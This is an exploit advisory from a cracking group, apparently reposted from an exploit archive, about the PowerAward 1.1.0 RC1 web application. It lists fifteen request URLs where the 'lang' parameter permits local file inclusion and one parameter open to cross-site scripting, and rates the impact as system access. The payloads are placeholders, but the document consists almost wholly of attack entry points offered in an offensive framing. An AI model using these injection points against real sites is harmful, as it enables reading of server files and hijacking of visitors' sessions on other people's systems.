Exploit for unknown platform in category web applications
===============================================================
PowerAward 1.1.0 RC1 (LFI /XSS) Multiple Remote Vulnerabilities
===============================================================
?-----------------------------------------------------------------------------¬
¦¦ C r a C k E r --
-- T H E C R A C K O F E T E R N A L M I G H T ¦¦
L-----------------------------------------------------------------------------
----- From The Ashes and Dust Rises An Unimaginable crack.... ----¬
-----------------------------------------------------------------------------¬
-- [ Local File Include ] [XSS] --
L-----------------------------------------------------------------------------
: Author : CraCkEr : : :
¦ Group : uNiTeD CraCkiNg ForCE ¦ ¦ ¦
¦ Script : PowerAward 1.1.0 RC1 ¦ ¦ Register Globals : ¦
¦ Download : SourceForge.net ¦ ¦ ¦
¦ Method : GET ¦ ¦ [-] ON [ ] OFF ¦
¦ Critical : High [--------] ¦ ¦ ¦
¦ Impact : System access ¦ ¦ ¦
¦ ------------------------------------- L----------------------------------- ¦
¦ DALnet #crackers --
L-----------------------------------------------------------------------------
: :
¦ Release Notes: ¦
¦ ============= ¦
¦ Typically used for remotely exploitable vulnerabilities that can lead to ¦
¦ system compromise. ¦
¦ ¦
-----------------------------------------------------------------------------¬
-- Exploit URL's --
L-----------------------------------------------------------------------------
[LFI]
http://localhost/path/agb.php?lang=[LFI]
http://localhost/path/angemeldet.php?lang=[LFI]
http://localhost/path/anmelden.php?lang=[LFI]
http://localhost/path/charts.php?lang=[LFI]
http://localhost/path/external_vote.php?lang=[LFI]
http://localhost/path/guestbook.php?lang=[LFI]
http://localhost/path/impressum.php?lang=[LFI]
http://localhost/path/index.php?lang=[LFI]
http://localhost/path/rss-reader.php?lang=[LFI]
http://localhost/path/statistic.php?lang=[LFI]
http://localhost/path/teilnehmer.php?lang=[LFI]
http://localhost/path/topsites.php?lang=[LFI]
http://localhost/path/votecode.php?lang=[LFI]
http://localhost/path/voting.php?lang=[LFI]
http://localhost/path/winner.php?lang=[LFI]
[XSS]
http://localhost/path/external_vote.php?l_vote_done=[XSS]
Notes: More files are infected!!
=====
L-----------------------------------------------------------------------------
Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS
-----------------------------------------------------------------------------¬
-- © CraCkEr 2008 --
L-----------------------------------------------------------------------------
# 0day.today [2018-01-08] #